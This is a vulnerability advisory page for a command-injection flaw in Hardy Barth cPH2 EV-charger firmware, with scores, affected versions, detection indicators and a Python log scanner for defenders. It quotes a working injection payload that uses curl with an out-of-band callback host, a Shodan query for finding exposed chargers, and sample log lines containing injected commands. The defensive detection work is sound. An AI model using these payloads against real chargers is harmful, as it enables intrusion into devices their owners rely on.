CVE-2023-46360
published 2024-02-06

CVE-2023-46360: Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.

Priority: P2 · 59 · high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: available
EPSS: 2.83% (84.9th percentile)

Affected (1 range)

Vendor        Product                  Version range   Fixed in
hardy-barth   cph2_echarge_firmware    <= 1.87.0       (none listed)

Detection & IOCs (extracted from sources)

url: /connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}
path: /connectioncheck.php
command: 127.0.0.1 && curl http://$(whoami).{{interactsh-url}}
  • Shodan query to identify exposed Hardy Barth cPH2 charging stations: search for HTML containing 'Salia PLCC'
  • Successful exploitation of the connectivity check endpoint returns the string 'SUCCESS' in the HTTP response body, with the injected payload reflected back
  • An out-of-band DNS callback via interactsh confirms code execution; monitor for DNS queries originating from the device whose leftmost label is the output of 'whoami'
  • The injection is triggered by a GET request to /connectioncheck.php with a crafted 'ip' parameter: the value is not restricted to an IP address, so shell metacharacters such as && followed by an arbitrary command are executed
  • Caveat: CVE-2023-46360 is described as 'Execution with Unnecessary Privileges' (CWE-250), whereas the request, payload and callback above match the Nuclei template for CVE-2023-46359, the OS command injection (CWE-78) in the same firmware. The two CVEs may require different detection approaches; the artifacts above detect the injection, and on their own say nothing about which privileges the injected command runs with.
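The request shape above (a GET to /connectioncheck.php whose 'ip' parameter carries shell metacharacters) is easy to hunt for retrospectively in web-server access logs. The following is an added example written for this page; it is not code from the vendor, the CVE sources or the Nuclei template. It assumes combined log format (Apache/nginx default); the log lines, the client addresses and the callback hostname oob.example are constructed for the example. Anything that is not a bare IP address is flagged, with shell metacharacters reported separately from merely malformed values.

```python
"""Scan access logs for command-injection attempts against /connectioncheck.php.

Added example for this page; the log lines below are constructed, not captured
from a real cPH2 device.
"""

import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Combined log format (assumed): client, ident, user, [timestamp], "METHOD target HTTP/x".
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Characters that let a value break out of a shell-interpolated argument.
SHELL_META_RE = re.compile(r'[;&|`$(){}<>\n\\]')

VULN_PATH = "/connectioncheck.php"
REASON_SHELL = "shell metacharacters in ip parameter"
REASON_NOT_IP = "ip parameter is not an IP address"

# Constructed sample log: one benign check, the page's payload (URL-encoded,
# with the interactsh placeholder replaced by a constructed hostname), a
# ';'-separated variant, an unrelated request, and a hostname instead of an IP.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Feb/2024:10:01:02 +0000] "GET /connectioncheck.php?ip=8.8.8.8 HTTP/1.1" 200 118
203.0.113.10 - - [06/Feb/2024:10:01:09 +0000] "GET /connectioncheck.php?ip=127.0.0.1%20%26%26%20curl%20http%3A%2F%2F%24%28whoami%29.oob.example HTTP/1.1" 200 201
203.0.113.11 - - [06/Feb/2024:10:02:33 +0000] "GET /connectioncheck.php?ip=127.0.0.1;id HTTP/1.1" 200 190
203.0.113.12 - - [06/Feb/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.13 - - [06/Feb/2024:10:04:41 +0000] "GET /connectioncheck.php?ip=example.com HTTP/1.1" 200 118
"""


def parse_query(query):
    """Split a raw query string on '&' first, then percent-decode each key/value.

    Splitting before decoding keeps an encoded '%26%26' inside a single value,
    which is exactly what the injected payload looks like on the wire.
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def classify_ip_param(value):
    """Return None for a bare IPv4/IPv6 address, otherwise a reason string."""
    try:
        ipaddress.ip_address(value)
        return None
    except ValueError:
        pass
    if SHELL_META_RE.search(value):
        return REASON_SHELL
    return REASON_NOT_IP


def scan_log(text):
    """Return one hit per suspicious /connectioncheck.php request in the log text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != VULN_PATH:
            continue
        for key, value in parse_query(target.query):
            if key != "ip":
                continue
            reason = classify_ip_param(value)
            if reason:
                hits.append({
                    "line": lineno,
                    "client": match.group("client"),
                    "ip_param": value,
                    "reason": reason,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> {hit['reason']}: {hit['ip_param']!r}")
```

The hostname hit is reported with a weaker reason than the metacharacter hits: a hostname may be a legitimate connectivity check on some firmware, so treat it as a review item rather than an alert. Pair the log hit with the DNS-callback indicator above (a query from the charger whose first label is a username) to confirm that the injected command actually ran.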